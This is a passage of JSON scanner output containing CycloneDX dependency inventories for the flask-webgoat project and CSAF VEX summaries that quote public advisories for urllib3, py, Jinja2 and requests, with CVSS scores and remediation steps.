{"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}}, "result_7": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": 
"flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": 
"SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_8": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": 
"itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_9": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}, "result_13": {"diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach. ## Affected usages We believe the number of usages affected by this advisory is low. 
It requires all of the following to be true to be exploited: * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin. ## Remediation * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header. ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I3PR7C6RJ6JUBQKIJ644DMIJSUP36VDY"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NDAGZXYJ7H2G3SB47M453VQVNAWKAEJJ"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43804"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 5.9, "environmentalSeverity": "MEDIUM", "integrityImpact": "HIGH", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "HIGH", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 5.9, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"]}], "title": "CVE-2023-43804/pkg:pypi/urllib3@2.0.4"}]}, "test/csaf_2.json": {}}, 
"common_summary": {"document": {"aggregate_severity": {"text": "High"}, "category": "csaf_vex", "csaf_version": "2.0", "lang": "en", "notes": [{"category": "legal_disclaimer", "text": "Depscan reachable code only covers the project source code, not the code of dependencies. A dependency may execute vulnerable code when called even if it is not in the project's source code. Regard the Depscan-set flag of 'code_not_in_execute_path' with this in mind."}], "publisher": {"category": "vendor", "contact_details": "vendor@mcvendorson.com", "name": "Vendor McVendorson", "namespace": "https://appthreat.com"}, "title": "Your Title"}, "product_tree": {"full_product_names": [{"name": "tinydb", "product_id": "tinydb:4.8.0", "product_identification_helper": {"purl": "pkg:pypi/tinydb@4.8.0"}}]}, "vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-42969"]}], "cve": "CVE-2022-42969", "cwe": {"id": "1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2022-10-16T12:00:23", "ids": [{"system_name": "CVE Record", "text": "CVE-2022-42969"}, {"system_name": "Pypi Advisory", "text": "py"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# ReDoS in py library when used with subversion The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. The particular codepath in question is the regular expression at `py._path.svnurl.InfoSvnCommand.lspattern` and is only relevant when dealing with subversion (svn) projects. Notably the codepath is not used in the popular pytest project. The developers of the pytest package have released version `7.2.0` which removes their dependency on `py`. 
Users of `pytest` seeing alerts relating to this advisory may update to version `7.2.0` of `pytest` to resolve this issue. See https://github.com/pytest-dev/py/issues/287#issuecomment-1290407715 for additional context. ## Related CVE(s) CVE-2022-42969, PYSEC-2022-42969"}, {"category": "description", "details": "Vulnerability Description", "text": "ReDoS in py library when used with subversion "}], "product_status": {"known_affected": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}, "references": [{"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Cve 2022", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42969"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}, {"summary": "Pypi Advisory py", "url": "https://pypi.org/project/py"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "environmentalScore": 7.5, "environmentalSeverity": "HIGH", "integrityImpact": "NONE", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "HIGH", "modifiedConfidentialityImpact": "NONE", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 7.5, "temporalSeverity": "HIGH", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["py@vers:pypi/>=0.0.0|<=1.11.0"]}], "title": "CVE-2022-42969/pkg:pypi/py@1.11.0"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-45803"]}], "cve": "CVE-2023-45803", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-17T20:15:25", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-45803"}, 
{"system_name": "GitHub Advisory", "text": "GHSA-g4mx-q9vg-27p4"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-212"}, {"system_name": "Rfc-editor Advisory", "text": "rfc9110"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# urllib3's request body not stripped after redirect from 303 status changes request method to GET urllib3 previously wouldn't remove the HTTP request body when an HTTP redirect response using status 303 \"See Other\" after the request had its method changed from one that could accept a request body (like `POST`) to `GET` as is required by HTTP RFCs. Although the behavior of removing the request body is not specified in the section for redirects, it can be inferred by piecing together information from different sections and we have observed the behavior in other major HTTP client implementations like curl and web browsers. From [RFC 9110 Section 9.3.1](https://www.rfc-editor.org/rfc/rfc9110.html#name-get): > A client SHOULD NOT generate content in a GET request unless it is made directly to an origin server that has previously indicated, in or out of band, that such a request has a purpose and will be adequately supported. ## Affected usages Because the vulnerability requires a previously trusted service to become compromised in order to have an impact on confidentiality we believe the exploitability of this vulnerability is low. Additionally, many users aren't putting sensitive data in HTTP request bodies, if this is the case then this vulnerability isn't exploitable. Both of the following conditions must be true to be affected by this vulnerability: * If you're using urllib3 and submitting sensitive information in the HTTP request body (such as form data or JSON) * The origin service is compromised and starts redirecting using 303 to a malicious peer or the redirected-to service becomes compromised. 
## Remediation You can remediate this vulnerability with any of the following steps: * Upgrade to a patched version of urllib3 (v1.26.18 or v2.0.7) * Disable redirects for services that you aren't expecting to respond with redirects with `redirects=False`. * Disable automatic redirects with `redirects=False` and handle 303 redirects manually by stripping the HTTP request body. ## Related CVE(s) CVE-2023-45803, PYSEC-2023-212"}, {"category": "description", "details": "Vulnerability Description", "text": "urllib3's request body not stripped after redirect from 303 status changes request method to GET"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"], "known_not_affected": ["urllib3@2.0.7"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-212", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-212.yaml"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "GitHub Advisory GHSA-g4mx-q9vg-27p4", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-g4mx-q9vg-27p4"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4R2Y5XK3WALSR3FNAGN7JBYV2B343ZKB"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5F5CUBAN5XMEBVBZPHFITBLMJV5FIJJ5"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PPDPLM6UUMN55ESPQWJFLLIZY4ZKCNRX"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Cve 2023", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45803"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}, {"summary": "Rfc-editor Advisory rfc9110", "url": "https://www.rfc-editor.org/rfc/rfc9110.html#name-get"}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "environmentalScore": 4.2, "environmentalSeverity": "MEDIUM", "integrityImpact": "NONE", "modifiedAttackComplexity": "HIGH", "modifiedAttackVector": "ADJACENT_NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "HIGH", "modifiedIntegrityImpact": "NONE", "modifiedPrivilegesRequired": "HIGH", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "temporalScore": 4.2, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "products": ["urllib3@vers:pypi/>=2.0.0|<2.0.7"]}], "title": "CVE-2023-45803/pkg:pypi/urllib3@2.0.4"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-22195"]}], "cve": "CVE-2024-22195", "cwe": {"id": "79", "name": "Improper Neutralization of Input 
During Web Page Generation"}, "discovery_date": "2024-01-11T15:20:48", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-22195"}, {"system_name": "GitHub Advisory", "text": "GHSA-h5c8-rqwp-cp95"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing spaces. XML/HTML attributes cannot contain spaces, as each would then be interpreted as a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. Note that accepting keys as user input is not common or a particularly intended use case of the `xmlattr` filter, and an application doing so should already be verifying what keys are provided regardless of this fix."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}, "references": [{"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "GitHub Advisory GHSA-h5c8-rqwp-cp95", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00010.html"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project 
Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5XCWZD464AJJJUBOO7CMPXQ4ROBC6JX2"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DELCVUUYX75I5K4Q5WMJG4MUZJA6VAIP"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/O7YWRBX6JQCWC2XXCTZ55C7DPMGICCN3"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22195"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.2"]}], "title": "CVE-2024-22195/pkg:pypi/jinja2@3.1.2"}, 
{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-34064"]}], "cve": "CVE-2024-34064", "cwe": {"id": "79", "name": "Improper Neutralization of Input During Web Page Generation"}, "discovery_date": "2024-05-06T14:20:59", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-34064"}, {"system_name": "GitHub Advisory", "text": "GHSA-h75v-3vvj-5mfj"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for the previous GHSA-h5c8-rqwp-cp95 CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. 
Accepting _values_ as user input continues to be safe."}, {"category": "description", "details": "Vulnerability Description", "text": "Jinja vulnerable to HTML attribute injection when passing user input as keys to xmlattr filter"}], "product_status": {"known_affected": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}, "references": [{"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "GitHub Advisory GHSA-h75v-3vvj-5mfj", "url": "https://github.com/pallets/jinja/security/advisories/GHSA-h75v-3vvj-5mfj"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/567XIGSZMABG6TSMYWD7MIYNJSUQQRUC"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCLF44KY43BSVMTE6S53B4V5WP3FRRSE"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SSCBHIL6BYKR5NRCBXP4XMP2CEEKGFVS"}, {"summary": "Fedora Project Mailing List Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "Fedora Project Mailing List 
Announcement", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZALNWE3TXPPHVPSI3AZ5CTMSTAVN5UMS"}, {"summary": "CVE Record", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}, {"summary": "Cve 2024", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34064"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "environmentalScore": 5.4, "environmentalSeverity": "MEDIUM", "integrityImpact": "LOW", "modifiedAttackComplexity": "LOW", "modifiedAttackVector": "NETWORK", "modifiedAvailabilityImpact": "NONE", "modifiedConfidentialityImpact": "LOW", "modifiedIntegrityImpact": "LOW", "modifiedPrivilegesRequired": "NONE", "modifiedScope": "UNCHANGED", "modifiedUserInteraction": "REQUIRED", "privilegesRequired": "NONE", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "version": "3.1"}, "products": ["jinja2@vers:pypi/>=2.0|<=3.1.3"]}], "title": "CVE-2024-34064/pkg:pypi/jinja2@3.1.2"}, {"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-35195"]}], "cve": "CVE-2024-35195", "cwe": {"id": "670", "name": "Always-Incorrect Control Flow Implementation"}, "discovery_date": "2024-05-20T20:15:00", "ids": [{"system_name": "CVE Record", "text": "CVE-2024-35195"}, {"system_name": "GitHub Advisory", "text": "GHSA-9wx4-h78v-vm56"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# Requests `Session` object does not verify requests after making first request with verify=False When making requests through a Requests `Session`, if the first request is made with `verify=False` to disable cert verification, all subsequent requests to the same origin will continue to ignore cert verification regardless of 
